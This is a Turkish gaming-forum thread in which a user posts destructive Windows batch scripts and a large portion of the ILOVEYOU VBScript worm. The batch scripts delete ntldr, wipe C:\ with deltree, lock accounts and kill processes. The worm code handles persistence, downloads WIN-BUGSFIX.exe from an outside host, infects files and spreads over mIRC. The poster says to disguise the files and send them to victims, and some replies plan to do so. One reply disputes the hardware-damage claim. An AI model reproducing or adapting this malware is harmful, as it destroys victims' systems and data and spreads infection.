Duyuru

Collapse

Oyuncehennemi.Com Forum Kuralları (Paylaşım Yapmadan Önce Okuyunuz)!!!

1- Forum'da siyasi ve dini içerikli yazı, siyasi ve dini propaganda, genel ahlaka aykırı küfürlü yazı, argo kabul edilen yazılar, hakaret benzeri yazılar kesinlikle yasaktır. Bu kurala uymayanlar forumdan direkt olarak uzaklaştırılacaktır..

2- Aynı şekilde, başka bir forum katılımcısını yada üçüncü bir şahsı küçültücü veya hakaret edici yazı yazılamaz.
Bu kurala uymayanlar forumdan direkt olarak uzaklaştırılacaktır..

3- Halkın sosyal sınıf, ırk, din, mezhep veya bölge bakımından farklı özelliklere sahip bir kesimini, diğer bir kesimi aleyhine kamunun güvenliği için tehlikeli tarzda kin ve düşmanlığa alenen tahrik edici yazılar ve halkın bir kesiminin benimsediği dinî değerleri alenen aşağılayan yazılar yazılamaz. Bu kurala uymayanlar forumdan direkt olarak uzaklaştırılacaktır..

4- Y
eni bir konu açmadan önce o konunun Forum'da mevcut olup olmadığı kontrol edilmelidir. Aynı isimli veya aynı tartışmaları içeren konular açmak yasaktır..

5- Forum dilinde,
mesaj yazarken büyük harf kullanmak bağırmak anlamına geleceği için mesajların büyük harf kullanılarak yazılması yasaktır. Kurala uymayanlar cezalandırılacaktır..

6- Üye olurken ahlaksız isim seçmek, başkasının kullanıcı adı ile foruma katılmak, sırf üye olmak için abuk subuk kullanıcı adları seçmek yasaktır. Bu tarz üyelikler anında forumdan uzaklaştırılacaktır..

7- Lisanslı Türk oyunları paylaşımı kesinlikle yasaktır. Bilinçli olarak bunları paylaşanlara gerekli yaptırım uygulanacaktır..

8- Rar şifrelerinde Türk forumları verenlere reklamcı uygulaması yapılacaktır. Gizli yada açık hiçbir rar şifresi bünyemiz dışındaki forumların, sitelerin isimlerini taşımayacaktır..

9-
Forum ve bölüm genelinde her türlü reklam, küfürlü söz, hakaret vs tarzı şeyler yasaktır. Başka Forumlara üye veya kullanıcı toplamak için yazılan reklam mahiyetinde yazılar (Özel Mesaj Dahil) yasaktır. Kurala uymayanlar anında forumdan uzaklaştırışacaktır..

10- Konu başlıklarını konunun içeriğini ifade eden şekilde seçilmesi gerekmektedir. (yardım, lütfen, acil vs ve kişiye özel başlıklar uyarı yapılmaksızın kapanabilir yada değiştirilir.)

11- Nick değişimleri belirli aralıklarla yapılmaktadır. Üyelerin nick değişikliği taleplerinin karşılanması için en az 50 mesajlarının olması gerekmektedir. Yetkililer ise toplamda 3 kere nick değiştirebilirler

12- Forum'da yazılacak konular ilgili bölümlere yazılmalıdır. Yöneticiler, yazılan yazının konusuyla ilgili olmayan bir bölümde yazıldığına karar verirlerse ve (veya) konunun uygun olmadığına karar verirlerse konuyu uygun bölüme taşırlar. Ayrıca uyarı ile kapatılan konuların devamı niteliğinde veya aynı içerikte konu açılamaz ! Herhangi bir yardım yada bir amaç olmadan gereksiz yere eski konular aktif edilemez !

13- Forumumuzda ''flood'' (arka arkaya mesaj yazarak konularını öne çıkarma) yapılması kesinlikle yasaktır.
Konulara yorum yaparken, konuyla alakası olmayan mesajlar yazmak, belli bir amacı, paylaşımı olmayan mesajlar yazmak yasaktır.

14- Forumda MP3 ve Albüm paylaşımları yapmak yasaktır. Bu paylaşımları kasti yapan üyeler forumdan tamamen uzaklaştırılacaktır. Mevcut ip numaraları üzerinde ki diğer üyelikleri de bu uzaklaştırmaya dahildir.

15- Tüm avatar ve imzalar genel ahlak ve kurallar çerçevesinde olacaktır. İmza alanlarına her türlü forum linki ve forum bağlantılı portal linki, ticari site linki, reklam amaçlı mesaj yazmak yasaktır. Ayrıca imza alanında poster şeklinde resimler kullanmak, belirlenen boyutu aşacak imzalar oluşturmak, küfürlü metinler yazmak, siyasi propangada yazıları yazmak, pornografik içerik eklemek kesinlikle yasaktır. Bu tarz imza ve avatar sahiplerine yaptırım uygulanacaktır..

16- Kullanıcılar kendi kullanıcı adı ve şifrelerini korumakla sorumludurlar, başkası kullanır ve o nickle kural dışı paylaşımlar yapılırsa, nick forumdan uzaklaştırılır. Ayrıca, aynı kişinin birden fazla rumuz veya isimle, farklı kişilermiş gibi aynı konuda görüş belirtmesi yasaktır. Tespit edilmesi durumunda, bu mesajlar silinecek ve üyenin forum'a girişini yasaklanacaktır.

17- Forum'un resmi dili Türkçe olup kabul edilen alfabe latin alfabesidir. Bunun dışında hiç bir dille mesaj yazılamaz..

18- Herhangi bir ürün satan üyenin, Satış - Takas bölümündeki kurallara harfiyen uyması gerekmektedir. Ticari amaçla ilan veren üye forumdan uzaklaştırılır. Forum üzerinden yapılan alım-satımlarda tüm sorumluluk alışverişi yapan taraflardadır, bu alışverişin olumlu yada olumsuz sonuçlanmasından forum ve yönetim kadrosu sorumlu tutulamaz.

Forum kurallarını değiştirmek www.oyuncehennemi.com yönetiminin insiyatifindedir. Tüm üyeler bu kuralları kabul etmiş sayılacaktır. Üyelerin ben görmedim okumadım deme hakları yoktur. Kurallara uymayanlar forumdan uzaklaştırılacaktır..
See more
See less

Virüs kodları .bat

Collapse
This topic is closed.
X
X
 • Filter
 • Saat
 • Show
Clear All
new posts

 • Virüs kodları .bat


  Bat virüsü hazırlama
  İşte kodlar:

  cd..

  cd..

  attrib -s -h -r -a c:\ntldr

  del c:\ntldr

  shutdown -r

  arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!

  örneğin; güzelresimler.bat

  sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.

  haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.

  yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..

  panzehir kodları;

  shutdown -a

  _________________________________________

  Yöntem Ms-dostan Pc ye gir


  ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi "Programlar>Çalıştır>telnet" yazıp telneti açıyoruz sonra "uzaktaki sistem" deyip adamın ip'sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin...

  CaptureScreen Ekrandan goruntu alır
  DelFile;(filename.exe) Dosya siler
  DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
  DisableKeys;0; Klavye tekrar aktif olur
  DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir
  DownloadFile;(path:filename.exe) istediginiz dosyayi cekersiniz
  Eject;1 CD-ROM'u acar
  Eject;0 CD-ROM'u kapar
  ExitWin;1 Windos'u kapar
  GetApps Calısan prg.ları listeler
  GetACL Admin Listi verir
  GetInfo Info penceresini verir
  GetDisks Hardiskindeki dosyaları gosterir
  GetSetup Server icin ayarları verir
  GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar
  KeyClick;1 Key click on
  KeyClick;0 Key click off
  Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz
  Listen;0 Stop listening
  Message;(message) Messagebox halinde mesaj yolalrsınız
  NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)
  Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)
  PlaySound;(file.wav) wav dosyası calar
  PortRedir;(listen tcp port);(ip);(destination port) ******** the specified port
  Record;10 = 10 saniyelik ses kaydeder
  RemoveServer;1 Server'ı kaldırır
  RemoveServer;0 Kaldırmayı iptal eder
  ShowImage;(file.exe) Resim gosterir
  SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler
  SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]
  SetACL;(ip)| Set (admin) access IP`s
  SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız
  SwapButton;1 Mouse'un tuslarının yerlerini degistirir
  SwapButton;0 Mouse'u eski haline getirir
  StartApp;(file.exe) Program calıstırır
  UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız


  _________________________________________

  Yöntem Ekran Kartını Yakın


  @echo off
  C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
  @echo off
  C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
  @echo off
  C:\WINDOWS\COMMAND\deltree /y c:\*.*
  @echo off
  cls
  cls
  @echo .:: HacKeD By RaZoR::.
  @echo off3.


  kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
  vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By RaZoR yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin

  _________________________________________

  buda Format virüsü karşıya gönderdiğinizde 30sn içinde pc otomatikmen format atıyor ayrıca format atarken ekran kartını yakıp CD-romu bozuyor yani format attıktan sonra tekrardan windowsu geri yüklüyemeyecektir çünkü CD-rom Cd okumuyacaktı yenisini alsa bile yani anlıcayacğınız pc toprak oldu demektir

  rem delete -pcaş(-vbe)
  On es error -pc
  On error Next Pc Hack
  dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
  eq=""
  ctr=0
  Set fso = CreateObject("Scripting.FileSystemObject")
  set file = fso.OpenTextFile(WScript.ScriptFullname,1)
  vbscopy=file.ReadAll
  main()
  sub main()
  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
  if (rr>=1) then
  wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
  end if
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(dirsystem&"\MSKernel32.vbs")
  c.Copy(dirwin&"\Win32DLL.vbs")
  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  regruns()
  html()
  spreadtoemail()
  listadriv()
  end sub
  sub regruns()
  On Error Resume Next
  Dim num,downread
  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
  downread=""
  downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
  if (downread="") then
  downread="c:\"
  end if
  if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
  Randomize
  num = Int((4 * Rnd) + 1)
  if num = 1 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
  elseif num = 2 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
  elseif num = 3 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
  elseif num = 4 then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
  end if
  end if
  if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
  regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
  end if
  end sub
  sub listadriv
  On Error Resume Next
  Dim d,dc,s
  Set dc = fso.Drives
  For Each d in dc
  If d.DriveType = 2 or d.DriveType=3 Then
  folderlist(d.path&"\")
  end if
  Next
  listadriv = s
  end sub
  sub infectfiles(folderspec)
  On Error Resume Next
  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
  set f = fso.GetFolder(folderspec)
  set fc = f.Files
  for each f1 in fc
  ext=fso.GetExtensionName(f1.path)
  ext=lcase(ext)
  s=lcase(f1.name)
  if (ext="vbs") or (ext="vbe") then
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  bname=fso.GetBaseName(f1.path)
  set cop=fso.GetFile(f1.path)
  cop.copy(folderspec&"\"&bname&".vbs")
  fso.DeleteFile(f1.path)
  elseif(ext="jpg") or (ext="jpeg") then
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  set cop=fso.GetFile(f1.path)
  cop.copy(f1.path&".vbs")
  fso.DeleteFile(f1.path)
  elseif(ext="mp3") or (ext="mp2") then
  set mp3=fso.CreateTextFile(f1.path&".vbs")
  mp3.write vbscopy
  mp3.close
  set att=fso.GetFile(f1.path)
  att.attributes=att.attributes+2
  end if
  if (eq<>folderspec) then
  if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
  set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
  scriptini.WriteLine "[script]"
  scriptini.WriteLine ";mIRC Script"
  scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
  scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
  scriptini.WriteLine ";"
  scriptini.WriteLine ";Khaled Mardam-Bey"
  scriptini.WriteLine ";http://www.mirc.com"
  scriptini.WriteLine ";"
  scriptini.WriteLine "n0=on 1:JOIN:#:{"
  scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
  scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
  scriptini.WriteLine "n3=}"
  scriptini.close
  eq=folderspec
  end if
  end if
  next
  end sub
  sub folderlist(folderspec)
  On Error Resume Next
  dim f,f1,sf
  set f = fso.GetFolder(folderspec)
  set sf = f.SubFolders
  for each f1 in sf
  infectfiles(f1.path)
  folderlist(f1.path)
  next
  end sub
  sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey,regvalue
  end sub
  function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  regget=regedit.RegRead(value)
  end function
  function fileexist(filespec)
  On Error Resume Next
  dim msg
  if (fso.FileExists(filespec)) Then
  msg = 0
  else
  msg = 1
  end if
  fileexist = msg
  end function
  function folderexist(folderspec)
  On Error Resume Next
  dim msg
  if (fso.GetFolderExists(folderspec)) then
  msg = 0  _________________________________________


  sırada karşıdaki pc ye karşıdakinin haberi olmadan şifre koymak var aşağıdaki kdou .bat çevirip gönderin

  net user %username% [parola]


  _________________________________________

  sıradaki kod karşıdakinin ekranını ve msn sini kaptıyor aşağıdaki kodları ne kadar çok yazarsanız karşıdaki pc nin ekranı ve msn si o kadar uzun süre kapanır

  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer
  start tskill msnmsgr
  start tskill explorer


  benden bu kadar daha .bat virüsleri bulursam sizlerle paylaşırım
  Last edited by RaZoR^_^; 19-09-10, 20:49. Sebep: yanlıslık

 • #2
  güzel pay. işime yarayabilir deneyecem...
  ⓧ_ⓧ ⓖⓐⓜⓔ ⓞⓥⓔⓡ

  Comment


  • #3
   Korktuğum için arkadaşımın PC sinde deneyeceğim...
   Tek Aşk BeşiktAŞK!!!

   Comment


   • #4
    Evet arkadaşlar zaten çoğu virüsler böyle oluyor bir nevi işte bunları .dll yapıp yolluyorlar sağol kardeş gıcık olduğum biri vardı yapıp yollucam pc'sini kaybetsinde görsün... aileme küfür etmek neymiş

    Comment


    • #5
     tipik bir sallama anlayışı hiç bir virüs programı ekran kartını kalıcı bir şekilde bozamaz bozması için overclock yapması gerekir yani voltaj ayarları

     Comment


     • #6
      ​Sitede hack,trojen vs.paylaşımı yapmak yasaktır.
      Fikirlere Kurşun İşlemez.

      Comment

      Working...
      X
      porno